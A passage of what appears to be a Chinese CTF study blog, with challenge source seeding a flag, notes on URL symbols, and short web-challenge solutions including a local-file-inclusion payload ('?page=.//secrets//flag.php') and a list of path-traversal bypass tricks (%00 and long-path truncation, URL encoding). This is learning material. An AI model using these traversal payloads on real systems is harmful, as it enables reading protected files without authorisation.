<span class="string">&quot;Palladium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">47</span>, <span class="string">&quot;Ag&quot;</span>, <span class="string">&quot;Silver&quot;</span>),</span><br><span class="line">        Metal(<span class="number">48</span>, <span class="string">&quot;Cd&quot;</span>, <span class="string">&quot;Cadmium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">49</span>, <span class="string">&quot;In&quot;</span>, <span class="string">&quot;Indium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">50</span>, <span class="string">&quot;Sn&quot;</span>, <span class="string">&quot;Tin&quot;</span>),</span><br><span class="line">        Metal(<span class="number">55</span>, <span class="string">&quot;Cs&quot;</span>, <span class="string">&quot;Cesium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">56</span>, <span class="string">&quot;Ba&quot;</span>, <span class="string">&quot;Barium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">57</span>, <span class="string">&quot;La&quot;</span>, <span class="string">&quot;Lanthanum&quot;</span>),</span><br><span class="line">        Metal(<span class="number">58</span>, <span class="string">&quot;Ce&quot;</span>, <span class="string">&quot;Cerium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">59</span>, <span class="string">&quot;Pr&quot;</span>, <span class="string">&quot;Praseodymium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">60</span>, <span class="string">&quot;Nd&quot;</span>, <span class="string">&quot;Neodymium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">61</span>, <span class="string">&quot;Pm&quot;</span>, <span class="string">&quot;Promethium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">62</span>, <span class="string">&quot;Sm&quot;</span>, <span class="string">&quot;Samarium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">63</span>, <span class="string">&quot;Eu&quot;</span>, <span class="string">&quot;Europium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">64</span>, <span class="string">&quot;Gd&quot;</span>, <span class="string">&quot;Gadolinium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">65</span>, <span class="string">&quot;Tb&quot;</span>, <span class="string">&quot;Terbium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">66</span>, <span class="string">&quot;Dy&quot;</span>, <span class="string">&quot;Dysprosium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">67</span>, <span class="string">&quot;Ho&quot;</span>, <span class="string">&quot;Holmium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">68</span>, <span class="string">&quot;Er&quot;</span>, <span class="string">&quot;Erbium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">69</span>, <span class="string">&quot;Tm&quot;</span>, <span class="string">&quot;Thulium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">70</span>, <span class="string">&quot;Yb&quot;</span>, <span class="string">&quot;Ytterbium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">71</span>, <span class="string">&quot;Lu&quot;</span>, <span class="string">&quot;Lutetium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">72</span>, <span class="string">&quot;Hf&quot;</span>, <span class="string">&quot;Hafnium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">73</span>, <span class="string">&quot;Ta&quot;</span>, <span class="string">&quot;Tantalum&quot;</span>),</span><br><span class="line">        Metal(<span class="number">74</span>, <span class="string">&quot;W&quot;</span>, <span class="string">&quot;Tungsten&quot;</span>),</span><br><span class="line">        Metal(<span class="number">75</span>, <span class="string">&quot;Re&quot;</span>, <span class="string">&quot;Rhenium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">76</span>, <span class="string">&quot;Os&quot;</span>, <span class="string">&quot;Osmium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">77</span>, <span class="string">&quot;Ir&quot;</span>, <span class="string">&quot;Iridium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">78</span>, <span class="string">&quot;Pt&quot;</span>, <span class="string">&quot;Platinum&quot;</span>),</span><br><span class="line">        Metal(<span class="number">79</span>, <span class="string">&quot;Au&quot;</span>, <span class="string">&quot;Gold&quot;</span>),</span><br><span class="line">        Metal(<span class="number">80</span>, <span class="string">&quot;Hg&quot;</span>, <span class="string">&quot;Mercury&quot;</span>),</span><br><span class="line">        Metal(<span class="number">81</span>, <span class="string">&quot;Tl&quot;</span>, <span class="string">&quot;Thallium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">82</span>, <span class="string">&quot;Pb&quot;</span>, <span class="string">&quot;Lead&quot;</span>),</span><br><span class="line">        Metal(<span class="number">83</span>, <span class="string">&quot;Bi&quot;</span>, <span class="string">&quot;Bismuth&quot;</span>),</span><br><span class="line">        Metal(<span class="number">84</span>, <span class="string">&quot;Po&quot;</span>, <span class="string">&quot;Polonium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">87</span>, <span class="string">&quot;Fr&quot;</span>, <span class="string">&quot;Francium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">88</span>, <span class="string">&quot;Ra&quot;</span>, <span class="string">&quot;Radium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">89</span>, <span class="string">&quot;Ac&quot;</span>, <span class="string">&quot;Actinium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">90</span>, <span class="string">&quot;Th&quot;</span>, <span class="string">&quot;Thorium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">91</span>, <span class="string">&quot;Pa&quot;</span>, <span class="string">&quot;Protactinium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">92</span>, <span class="string">&quot;U&quot;</span>, <span class="string">&quot;Uranium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">93</span>, <span class="string">&quot;Np&quot;</span>, <span class="string">&quot;Neptunium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">94</span>, <span class="string">&quot;Pu&quot;</span>, <span class="string">&quot;Plutonium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">95</span>, <span class="string">&quot;Am&quot;</span>, <span class="string">&quot;Americium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">96</span>, <span class="string">&quot;Cm&quot;</span>, <span class="string">&quot;Curium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">97</span>, <span class="string">&quot;Bk&quot;</span>, <span class="string">&quot;Berkelium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">98</span>, <span class="string">&quot;Cf&quot;</span>, <span class="string">&quot;Californium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">99</span>, <span class="string">&quot;Es&quot;</span>, <span class="string">&quot;Einsteinium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">100</span>, <span class="string">&quot;Fm&quot;</span>, <span class="string">&quot;Fermium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">101</span>, <span class="string">&quot;Md&quot;</span>, <span class="string">&quot;Mendelevium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">102</span>, <span class="string">&quot;No&quot;</span>, <span class="string">&quot;Nobelium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">103</span>, <span class="string">&quot;Lr&quot;</span>, <span class="string">&quot;Lawrencium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">104</span>, <span class="string">&quot;Rf&quot;</span>, <span class="string">&quot;Rutherfordium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">105</span>, <span class="string">&quot;Db&quot;</span>, <span class="string">&quot;Dubnium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">106</span>, <span class="string">&quot;Sg&quot;</span>, <span class="string">&quot;Seaborgium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">107</span>, <span class="string">&quot;Bh&quot;</span>, <span class="string">&quot;Bohrium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">108</span>, <span class="string">&quot;Hs&quot;</span>, <span class="string">&quot;Hassium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">109</span>, <span class="string">&quot;Mt&quot;</span>, <span class="string">&quot;Meitnerium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">110</span>, <span class="string">&quot;Ds&quot;</span>, <span class="string">&quot;Darmstadtium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">111</span>, <span class="string">&quot;Rg&quot;</span>, <span class="string">&quot;Roentgenium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">112</span>, <span class="string">&quot;Cn&quot;</span>, <span class="string">&quot;Copernicium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">113</span>, <span class="string">&quot;Nh&quot;</span>, <span class="string">&quot;Nihonium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">114</span>, <span class="string">&quot;Fl&quot;</span>, <span class="string">&quot;Flerovium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">115</span>, <span class="string">&quot;Mc&quot;</span>, <span class="string">&quot;Moscovium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">116</span>, <span class="string">&quot;Lv&quot;</span>, <span class="string">&quot;Livermorium&quot;</span>),</span><br><span class="line">    ]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> metal <span class="keyword">in</span> metals:</span><br><span class="line">        db_session.add(metal)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;/flag.txt&quot;</span>) <span class="keyword">as</span> filp:</span><br><span class="line">        flag = filp.read().strip()</span><br><span class="line"></span><br><span class="line">    db_session.add(Flag(flag))</span><br><span class="line">    db_session.commit()</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x770B;&#x4E86;&#x4E0D;&#x4F1A;&#x505A;&#xFF0C;&#x535A;&#x4E3B;&#x662F;<code>cryptocat</code>,youtube&#x548C;GitHub&#x540C;&#x540D;&#x3002;</p>
<hr>
<p>&#x590D;&#x4E60;&#x4E00;&#x4E0B;</p>
<p>URL&#x4E2D;&#x7684;<code>#?&amp;</code></p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">#</span><br><span class="line">1. #&#x4EE3;&#x8868;&#x7F51;&#x9875;&#x4E2D;&#x7684;&#x4E00;&#x4E2A;&#x4F4D;&#x7F6E;&#x3002;</span><br><span class="line">2. HTTP&#x8BF7;&#x6C42;&#x4E0D;&#x5305;&#x62EC;#</span><br><span class="line">3. &#x5728;&#x7B2C;&#x4E00;&#x4E2A;#&#x540E;&#x9762;&#x51FA;&#x73B0;&#x7684;&#x4EFB;&#x4F55;&#x5B57;&#x7B26;&#xFF0C;&#x90FD;&#x4F1A;&#x88AB;&#x6D4F;&#x89C8;&#x5668;&#x89E3;&#x8BFB;&#x4E3A;&#x4F4D;&#x7F6E;&#x6807;&#x8BC6;&#x7B26;&#x3002;</span><br><span class="line">4. &#x6539;&#x53D8;#&#x4E0D;&#x89E6;&#x53D1;&#x7F51;&#x9875;&#x91CD;&#x8F7D;</span><br><span class="line">5. &#x6539;&#x53D8;#&#x4F1A;&#x6539;&#x53D8;&#x6D4F;&#x89C8;&#x5668;&#x7684;&#x8BBF;&#x95EE;&#x5386;&#x53F2;</span><br><span class="line">6. onhashchange&#x4E8B;&#x4EF6;</span><br><span class="line">?</span><br><span class="line">1.&#x8FDE;&#x63A5;&#x4F5C;&#x7528;</span><br><span class="line"></span><br><span class="line">2.&#x6E05;&#x9664;&#x7F13;&#x5B58;</span><br><span class="line">&#x4E24;&#x4E2A;url&#x6253;&#x5F00;&#x7684;&#x9875;&#x9762;&#x4E00;&#x6837;&#xFF0C;&#x4F46;&#x662F;&#x540E;&#x9762;&#x8FD9;&#x4E2A;&#x6709;&#x95EE;&#x53F7;&#xFF0C;&#x8BF4;&#x660E;&#x4E0D;&#x8C03;&#x7528;&#x7F13;&#x5B58;&#x7684;&#x5185;&#x5BB9;&#xFF0C;&#x800C;&#x8BA4;&#x4E3A;&#x662F;&#x4E00;&#x4E2A;&#x65B0;&#x5730;&#x5740;&#xFF0C;&#x91CD;&#x65B0;&#x8BFB;&#x53D6;&#x3002;</span><br><span class="line"></span><br><span class="line">&#x56E0;&#x4E3A;&#x5728;&#x505A;http&#x8BF7;&#x6C42;&#x7684;&#x65F6;&#x5019;&#xFF0C;&#x5982;&#x679C;&#x6D4F;&#x89C8;&#x5668;&#x68C0;&#x6D4B;&#x5230;&#x4F60;&#x7684;&#x5730;&#x5740;&#x5B8C;&#x5168;&#x6CA1;&#x53D8;&#xFF0C;&#x4F1A;&#x4ECE;&#x7F13;&#x5B58;&#x91CC;&#x8BFB;&#x53D6;&#x5148;&#x524D;&#x8BF7;&#x6C42;&#x8FC7;&#x7684;&#x6570;&#x636E;&#xFF0C;&#x4E0D;&#x518D;&#x53D1;&#x9001;&#x8BF7;&#x6C42;&#x3002;&#x6709;&#x4E9B;&#x65F6;&#x5019;&#x662F;&#x9875;&#x9762;&#x8D44;&#x6E90;&#x7684;&#x52A0;&#x8F7D;&#xFF0C;&#x6709;&#x4E9B;&#x65F6;&#x5019;&#x662F;API&#x7684;get&#x8BF7;&#x6C42;&#xFF0C;&#x90FD;&#x6709;&#x53EF;&#x80FD;&#x3002;&#x52A0;&#x4E0A;&#x8FD9;&#x4E2A;&#xFF0C;&#x4F1A;&#x8BA9;&#x6D4F;&#x89C8;&#x5668;&#x8BA4;&#x4E3A;&#x8FD9;&#x662F;&#x4E00;&#x4E2A;&#x65B0;&#x7684;&#x5730;&#x5740;&#xFF0C;&#x4ECE;&#x800C;&#x4FDD;&#x8BC1;&#x91CD;&#x65B0;&#x83B7;&#x53D6;&#x8D44;&#x6E90;&#x3002;</span><br><span class="line">&amp;</span><br><span class="line">1.&#x8BF4;&#x660E;&#x4F5C;&#x7528;&#xFF08;&#x4E0D;&#x540C;&#x53C2;&#x6570;&#x7684;&#x95F4;&#x9694;&#x7B26;&#xFF09;</span><br><span class="line">http://www.xxx.com/Show.asp?id=77&amp;nameid=2905210001&amp;page=1</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


        <h1 id="&#x4E00;&#x4E9B;&#x7279;&#x522B;&#x7684;&#x9898;">
          <a href="#&#x4E00;&#x4E9B;&#x7279;&#x522B;&#x7684;&#x9898;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x4E00;&#x4E9B;&#x7279;&#x522B;&#x7684;&#x9898;" class="headerlink" title="&#x4E00;&#x4E9B;&#x7279;&#x522B;&#x7684;&#x9898;"></a>&#x4E00;&#x4E9B;&#x7279;&#x522B;&#x7684;&#x9898;</h1>
      
        <h2 id="5-2">
          <a href="#5-2" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-2" class="headerlink" title="5.2"></a>5.2</h2>
      
        <h3 id="http-193-57-159-27-44757">
          <a href="#http-193-57-159-27-44757" class="heading-link"><i class="fas fa-link"></i></a><a href="#http-193-57-159-27-44757" class="headerlink" title="http://193.57.159.27:44757/"></a><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://193.57.159.27:44757/">http://193.57.159.27:44757/</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></h3>
      <p><img src="/2022/04/30/4-30wp/4-30wp/image-20220502235019395.png" alt="image-20220502235019395"></p>
<p>&#x8FD9;&#x91CC;&#x4F7F;&#x7528;&#x7684;&#x662F;&#x53CC;&#x5199;&#x7ED5;&#x8FC7;&#xFF0C;&#x7531;&#x9898;&#x76EE;&#x4E2D;&#x7684;secret&#x53EF;&#x4EE5;&#x731C;&#x6D4B;flag&#x662F;&#x5728;secrets&#x8FD9;&#x4E2A;&#x76EE;&#x5F55;&#x4E0B;</p>
<p>&#x5728;<code>?page=</code>&#x540E;&#x9762;&#x8FDB;&#x884C;&#x5B9E;&#x9A8C;&#x4F1A;&#x56DE;&#x663E;</p>
<p><img src="/2022/04/30/4-30wp/4-30wp/image-20220502234947711.png" alt="image-20220502234947711"></p>
<p>&#x6240;&#x4EE5;&#x8003;&#x8651;&#x5728;<code>?page=</code>&#x540E;&#x9762;&#x5199;payload</p>
<p>&#x731C;&#x6D4B;flag&#x5728;flag.php&#x4E2D;</p>
<p>&#x6784;&#x9020;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?page=.//secrets//flag.php</span><br></pre></td></tr></table></div></figure>

<p>&#x7528;burp&#x53D1;&#x5305;&#xFF0C;&#x4F1A;&#x6709;&#x56DE;&#x663E;flags&#xFF08;&#x76F4;&#x63A5;&#x5728;url&#x540E;&#x9762;&#x52A0;&#x7136;&#x540E;&#x56DE;&#x8F66;&#x4F1A;&#x52A0;&#x8F7D;&#x4E0D;&#x51FA;&#x6765;&#xFF0C;&#x4E0D;&#x77E5;&#x9053;&#x662F;&#x4EC0;&#x4E48;&#x539F;&#x56E0;&#xFF09;</p>
<hr>
<p>&#x7136;&#x540E;&#x8FD8;&#x6709;&#x4E00;&#x4E2A;&#x5C0F;&#x77E5;&#x8BC6;&#x70B9;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/var/www/html/</span><br><span class="line">#&#x8FD9;&#x4E2A;&#x8DEF;&#x5F84;&#x662F;Apache&#x7684;web&#x6587;&#x4EF6;&#x7684;&#x9ED8;&#x8BA4;&#x8DEF;&#x5F84;</span><br><span class="line">/app/</span><br><span class="line">#&#x8FD9;&#x4E2A;&#x4E00;&#x822C;&#x662F;Python&#x6216;&#x8005;nodejs&#x7684;&#x9ED8;&#x8BA4;&#x8DEF;&#x5F84;</span><br></pre></td></tr></table></div></figure>




        <h4 id="&#x603B;&#x7ED3;&#x51E0;&#x79CD;&#x7ED5;&#x8FC7;">
          <a href="#&#x603B;&#x7ED3;&#x51E0;&#x79CD;&#x7ED5;&#x8FC7;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x603B;&#x7ED3;&#x51E0;&#x79CD;&#x7ED5;&#x8FC7;" class="headerlink" title="&#x603B;&#x7ED3;&#x51E0;&#x79CD;&#x7ED5;&#x8FC7;"></a>&#x603B;&#x7ED3;&#x51E0;&#x79CD;&#x7ED5;&#x8FC7;</h4>
      <ol>
<li><p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1690034">&#x4EFB;&#x610F;&#x6587;&#x4EF6;&#x5305;&#x542B;&#x6F0F;&#x6D1E;&#x7684;&#x7ED5;&#x8FC7;&#x65B9;&#x5F0F;</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</li>
<li><p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://blog.csdn.net/nzjdsds/article/details/82461112">php&#x4F2A;&#x534F;&#x8BAE;&#x5B9E;&#x73B0;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7684;&#x4E03;&#x79CD;&#x59FF;&#x52BF;</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</li>
<li><p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://www.ddosi.org/403-bypass/#403_header_payloads">&#x6E17;&#x900F;&#x6280;&#x5DE7;&#x4E4B;403&#x7ED5;&#x8FC7; (ddosi.org)</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</li>
<li><p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://www.cnblogs.com/cainiao-chuanqi/p/15192414.html#autoid-3-8-0">web&#x89E3;&#x9898;&#x601D;&#x8DEF;&#xFF08;&#x53C8;&#x662F;&#x4E00;&#x4E9B;&#x5F88;&#x597D;&#x7684;&#x6280;&#x5DE7;&#x603B;&#x7ED3;&#x8BED;&#x53E5;&#xFF09;</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h6 id="&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;">
          <a href="#&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;" class="headerlink" title="&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;"></a>&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;</h6>
      </li>
<li><p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://www.cnblogs.com/qiudabai/p/9763739.html">11&#x79CD;&#x7ED5;&#x8FC7;CDN&#x67E5;&#x627E;&#x771F;&#x5B9E;IP&#x65B9;&#x6CD5; </a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h6 id="&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;-1">
          <a href="#&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;-1" class="headerlink" title="&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;"></a>&#xFF08;&#x6CA1;&#x770B;&#x5B8C;&#xFF09;</h6>
      </li>
</ol>
<p>&#x7B2C;&#x4E09;&#x7BC7;&#x662F;&#x4E2A;&#x7684;&#x4E3B;&#x7AD9;&#x662F;&#x4E2A;&#x8D44;&#x6E90;&#x7F51;&#x7AD9;</p>
<p>&#x9700;&#x8981;&#x4E86;&#x5C31;&#x53BB;&#x4E0A;&#x9762;&#x67E5;</p>
<p>&#x957F;&#x76EE;&#x5F55;&#x622A;&#x65AD;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">.............</span><br><span class="line">./././././././././</span><br></pre></td></tr></table></div></figure>

<p>%00&#x622A;&#x65AD;</p>
<p>&#x57FA;&#x4E8E;session&#x673A;&#x5236;&#x4F20;&#x9A6C;&#xFF08;&#xFF1F;&#xFF09;</p>
<p>&#x53CC;&#x5199;&#x7ED5;&#x8FC7;<code>e.g.: //</code></p>
<p>&#x4F7F;&#x7528;&#x7EDD;&#x5BF9;&#x8DEF;&#x5F84;</p>
<p>&#x5BF9;&#x4E8E;Windows&#x7CFB;&#x7EDF;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x53CD;&#x659C;&#x6760;<code>\</code></p>
<p>&#x7F16;&#x7801;&#x7ED5;&#x8FC7;</p>
<p>&#x201C;.&#x201D;&#x548C;&#x201C;./&#x201D;&#x88AB;&#x8FC7;&#x6EE4;&#x65F6;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5C1D;&#x8BD5;&#x4F7F;&#x7528;URL&#x7F16;&#x7801;&#x7ED5;&#x8FC7;&#x201C;.&#x201D;&#x2013;&gt;%2E&#xFF0C;&#x201C;/&#x201D;&#x2013;&gt;%2F</p>
<p>%00&#x622A;&#x65AD;</p>
<p>&#x4F7F;&#x7528;&#x4F2A;&#x534F;&#x8BAE;</p>

        <h3 id="show-web&#x5165;&#x95E8;">
          <a href="#show-web&#x5165;&#x95E8;" class="heading-link"><i class="fas fa-link"></i></a><a href="#show-web&#x5165;&#x95E8;" class="headerlink" title="show web&#x5165;&#x95E8;"></a>show web&#x5165;&#x95E8;</h3>
      
        <h5 id="11">
          <a href="#11" class="heading-link"><i class="fas fa-link"></i></a><a href="#11" class="headerlink" title="11"></a>11</h5>
      <p>&#x57DF;&#x540D;&#x89E3;&#x6790;</p>
<p>&#x67E5;&#x770B;TXT&#x8BB0;&#x5F55;</p>

        <h4 id="12-amp-13">
          <a href="#12-amp-13" class="heading-link"><i class="fas fa-link"></i></a><a href="#12-amp-13" class="headerlink" title="12&amp;13"></a>12&amp;13</h4>
      <p>&#x5728;&#x7F51;&#x7AD9;&#x4E0A;&#x76F4;&#x63A5;&#x6CC4;&#x9732;&#x4E86; document&#x6216;&#x8005;&#x7BA1;&#x7406;&#x5458;&#x5BC6;&#x7801;&#xFF08;&#x73B0;&#x5728;robots.txt&#x4E2D;&#x67E5;&#x770B;&#xFF09;</p>

        <h4 id="14">
          <a href="#14" class="heading-link"><i class="fas fa-link"></i></a><a href="#14" class="headerlink" title="14"></a>14</h4>
      <p>&#x5165;&#x624B;&#x70B9;&#x5728;editor&#xFF0C;&#x901A;&#x8FC7;editor&#x53EF;&#x4EE5;&#x8FDB;&#x5165;&#x7F16;&#x8F91;&#x754C;&#x9762;</p>
<img src="/2022/04/30/4-30wp/image-20220503003640169.png" alt="image-20220503003640169" style="zoom:33%;">

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/editor</span><br></pre></td></tr></table></div></figure>



<p>&#x7136;&#x540E;&#x5C31;&#x662F;&#x65B0;&#x4E16;&#x754C;&#x7684;&#x5927;&#x95E8;&#x4E86;</p>
<p><img src="/2022/04/30/4-30wp/4-30wp.assets/image-20220503003708436.png" alt="image-20220503003708436"></p>
<p>&#x5728;&#x4E0A;&#x4F20;&#x6587;&#x4EF6;&#x7684;&#x5730;&#x65B9;&#xFF08;&#x56DE;&#x5F62;&#x9488;&#x56FE;&#x6807;&#xFF09;&#xFF0C;&#x8FDB;&#x5165;&#x6587;&#x4EF6;&#x7A7A;&#x95F4;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x67E5;&#x770B;&#x5230;&#x6240;&#x6709;&#x7684;&#x76EE;&#x5F55;&#xFF0C;&#x52A0;&#x4E0A;&#x4ECA;&#x5929;&#x5B66;&#x5230;&#x7684;&#x65B0;&#x77E5;&#x8BC6;&#xFF0C;&#x8FDB;&#x5165;<code>/var/www/html</code>&#x4F1A;&#x6709;&#x4E2A;<code>nothinghere</code>&#x6587;&#x4EF6;&#x5939;&#x7ACB;&#x7684;txt&#x6587;&#x4EF6;&#xFF0C;&#x52A0;&#x5728;url&#x540E;&#x9762;&#x8BBF;&#x95EE;&#x5373;&#x53EF;</p>

        <h2 id="5-3">
          <a href="#5-3" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-3" class="headerlink" title="5.3"></a>5.3</h2>
      
        <h4 id="15">
          <a href="#15" class="heading-link"><i class="fas fa-link"></i></a><a href="#15" class="headerlink" title="15"></a>15</h4>
      <p>&#x90AE;&#x7BB1;&#x88AB;&#x6CC4;&#x9732;&#x51FA;&#x53BB;&#x4E86;&#xFF0C;&#x7136;&#x540E;&#x901A;&#x8FC7;<code>/admin</code>&#x5F97;&#x5230;&#x4E86;&#x540E;&#x53F0;&#x7684;&#x767B;&#x5F55;</p>
<p>&#x901A;&#x8FC7;&#x5FD8;&#x8BB0;&#x5BC6;&#x7801;&#xFF0C;&#x8FDB;&#x5165;&#x5230;&#x5BC6;&#x4FDD;&#x95EE;&#x9898;&#xFF0C;&#x7136;&#x540E;&#x5F97;&#x77E5;QQ&#x53F7;&#x663E;&#x793A;&#x7684;&#x73B0;&#x5C45;&#x5730;&#x5373;&#x53EF;&#x83B7;&#x5F97;&#x5BC6;&#x7801;</p>

        <h4 id="16">
          <a href="#16" class="heading-link"><i class="fas fa-link"></i></a><a href="#16" class="headerlink" title="16"></a>16</h4>
      <p>&#x8003;&#x5BDF;PHP&#x63A2;&#x9488;php&#x63A2;&#x9488;&#x662F;&#x7528;&#x6765;&#x63A2;&#x6D4B;&#x7A7A;&#x95F4;&#x3001;&#x670D;&#x52A1;&#x5668;&#x8FD0;&#x884C;&#x72B6;&#x51B5;&#x548C;PHP&#x4FE1;&#x606F;&#x7528;&#x7684;&#xFF0C;&#x63A2;&#x9488;&#x53EF;&#x4EE5;&#x5B9E;&#x65F6;&#x67E5;&#x770B;&#x670D;&#x52A1;&#x5668;&#x786C;&#x76D8;&#x8D44;&#x6E90;&#x3001;&#x5185;&#x5B58;&#x5360;&#x7528;&#x3001;&#x7F51;&#x5361; &#x6D41;&#x91CF;&#x3001;&#x7CFB;&#x7EDF;&#x8D1F;&#x8F7D;&#x3001;&#x670D;&#x52A1;&#x5668;&#x65F6;&#x95F4;&#x7B49;&#x4FE1;&#x606F;&#x3002; url&#x540E;&#x7F00;&#x540D;&#x6DFB;&#x52A0;/tz.php &#x7248;&#x672C;&#x662F;&#x96C5;&#x9ED1;PHP&#x63A2;&#x9488;&#xFF0C;&#x7136;&#x540E;&#x67E5;&#x770B;phpinfo&#x641C;&#x7D22;flag</p>

        <h4 id="18">
          <a href="#18" class="heading-link"><i class="fas fa-link"></i></a><a href="#18" class="headerlink" title="18"></a>18</h4>
      <p>&#x5728;&#x524D;&#x7AEF;&#x4EE3;&#x7801;&#x4E2D;&#x6709;&#x4E00;&#x4E32;Unicode&#x7F16;&#x7801;&#xFF0C;&#x89E3;&#x7801;&#x5F97;&#x5230;&#x63D0;&#x793A;</p>
<p>&#x8BBF;&#x95EE;110.php&#x5373;&#x5F97;flag</p>

        <h4 id="19">
          <a href="#19" class="heading-link"><i class="fas fa-link"></i></a><a href="#19" class="headerlink" title="19"></a>19</h4>
      <p>&#x524D;&#x7AEF;&#x4EE3;&#x7801;&#x91CC;&#x6709;&#x63D0;&#x793A;&#xFF0C;&#x662F;&#x4E00;&#x6BB5;&#x6CE8;&#x91CA;</p>
